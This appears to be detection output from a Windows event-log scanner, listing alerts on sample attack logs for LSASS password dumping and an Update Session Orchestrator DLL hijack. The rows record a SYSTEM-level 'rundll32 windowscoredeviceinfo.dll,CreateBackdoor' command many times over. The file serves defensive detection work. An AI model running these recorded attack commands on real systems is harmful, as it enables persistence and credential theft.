2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: 
SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p 